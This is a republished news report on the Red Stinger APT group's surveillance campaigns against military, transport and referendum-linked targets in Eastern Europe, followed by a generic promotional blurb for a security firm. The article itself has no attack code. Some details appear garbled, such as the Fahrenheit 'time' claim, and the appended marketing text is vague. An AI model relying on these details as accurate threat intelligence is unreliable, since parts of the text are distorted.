New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe

red stinger

A previously undetected Advanced Persistent Threat Actor (APT). red stinger has been linked to attacks targeting Eastern Europe since 2020.

“Military, transport and critical infrastructure were among the entities targeted, as well as some involved in September’s Eastern Ukraine referendums,” Malwarebytes revealed in a report released today.

“Depending on the campaign, attackers were able to exfiltrate snapshots, USB drives, keystrokes and microphone recordings.”

Red Stinger overlaps with a cluster of threats Kaspersky disclosed under the name Bad Magic last month as targeting government, agricultural and transport organizations located in Donetsk, Lugansk and Crimea last year.

Cyber ​​security

While there were indications that the APT group may have been active since at least September 2021, Malwarebytes’ latest findings push the group’s origins back nearly a year, with the first operation taking place in December 2020.

At the time, the attack chain is said to have leveraged malicious installation files to drop the DBoxShell (aka PowerMagic) implant on compromised systems. The MSI file, on the other hand, is downloaded using a Windows shortcut file contained within a ZIP archive.

Subsequent waves detected in April and September 2021 have been observed to leverage similar attack chains, albeit with minor variations in MSI file names.

A fourth set of attacks coincided with the start of the Russian military invasion of Ukraine in February 2022. The last known activity associated with Red Stinger occurred in September 2022, as documented by Kaspersky.

“DBoxShell is malware that uses cloud storage services as a command and control (C&C) mechanism,” said security researchers Roberto Santos and Hossein Jazi.

red stinger

“This stage serves as an entry point for attackers, allowing them to assess whether the targets are interesting or not, meaning they will use different tools at this stage.”

The fifth operation is also notable for providing an alternative to DBoxShell called GraphShell, so named for its use of the Microsoft Graph API for C&C purposes.

The initial infection phase is followed by the threat actor deploying additional artifacts such as ngrok, rsockstun (a reverse tunneling utility), and a binary to exfiltrate victims’ data to a Dropbox account controlled by actor

The exact scale of the infections is unclear, although evidence points to two victims located in central Ukraine, a military target and an officer working on critical infrastructure, who were compromised as part of the attacks in February 2022.


Learn how to stop ransomware with real-time protection

Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.

Save my seat!

In both cases, threat actors extracted screenshots, microphone recordings, and office documents after a reconnaissance period. One of the victims also had his keystrokes recorded and uploaded.

The September 2022 set of intrusions, on the other hand, is notable in that it primarily targeted regions aligned with Russia, including officials and individuals involved in the election. One of the surveillance targets had data on their USB drives exfiltrated.

Malwarebytes said it also identified a library in the Ukrainian city of Vinnytsia that was infected as part of the same campaign, making it the only Ukraine-related entity it targeted. The motivations are currently unknown.

While the origins of the threat group are a mystery, it has emerged that threat actors managed to infect their own Windows 10 machines sometime in December 2022, either accidentally or for testing purposes (with the name TstUser), offering insight into its modus operandi.

Two things stand out: the choice of English as the default language and the use of the Fahrenheit temperature scale to display the time, which probably suggests the involvement of native English speakers.

“In this case, attributing the attack to a specific country is not an easy task,” the researchers said. “Any of the involved countries or aligned groups could be responsible, as some victims were aligned with Russia and others with Ukraine.”

“What is clear is that the main motive behind the attack was surveillance and data collection. The attackers used different layers of protection, had a broad set of tools for their victims, and the attack was clearly aimed at specific entities”.

Did you find this article interesting? Follow us at Twitter and LinkedIn to read more exclusive content we publish.

Source link
The Eastern European region has been subject to a potential upcoming cyber security threat. A new Advanced Persistent Threat (APT) group, known as Red Stinger, has been launching targeted assaults toward military and critical infrastructure located in the region.

Red Stinger has been using various tactics, techniques, and procedures over the past few months to gain access to sensitive networks and extract critical data. The attack surface of the Eastern European region has been increasing over the past year, since the start of the pandemic, as organizations have been transitioning to more digital devices and gaining access to sensitive databases.

Ikaroa, a full stack cybersecurity company, is committed to providing detailed security assessments and countermeasures for organizations in the Eastern European region. We work to identify any vulnerabilities, detect malicious activities and provide deep data protection for high-profile customers.

Our experts use the most advanced technologies in the field and have the expertise to prevent, detect and report incidents caused by APT such as Red Stinger. We also provide risk analyses, develop defensive and preventative measures, and deploy comprehensive security architecture that keeps businesses safe.

By using advanced monitoring and analysis tools, Ikaroa can quickly identify malicious activities and reduce the damage done by these threats. Our team also provides complete incident response, including post- incident analysis, to help organizations get a complete understanding of their situation and cope with the aftermath.

We are here to help ensure the security of organisations in the Eastern European region and help mitigate any cyber security threats. In collaboration with our customers, our goal is to prevent further malicious activity and build a secure environment for critical infrastructure and military operations.


Leave a Reply

Your email address will not be published. Required fields are marked *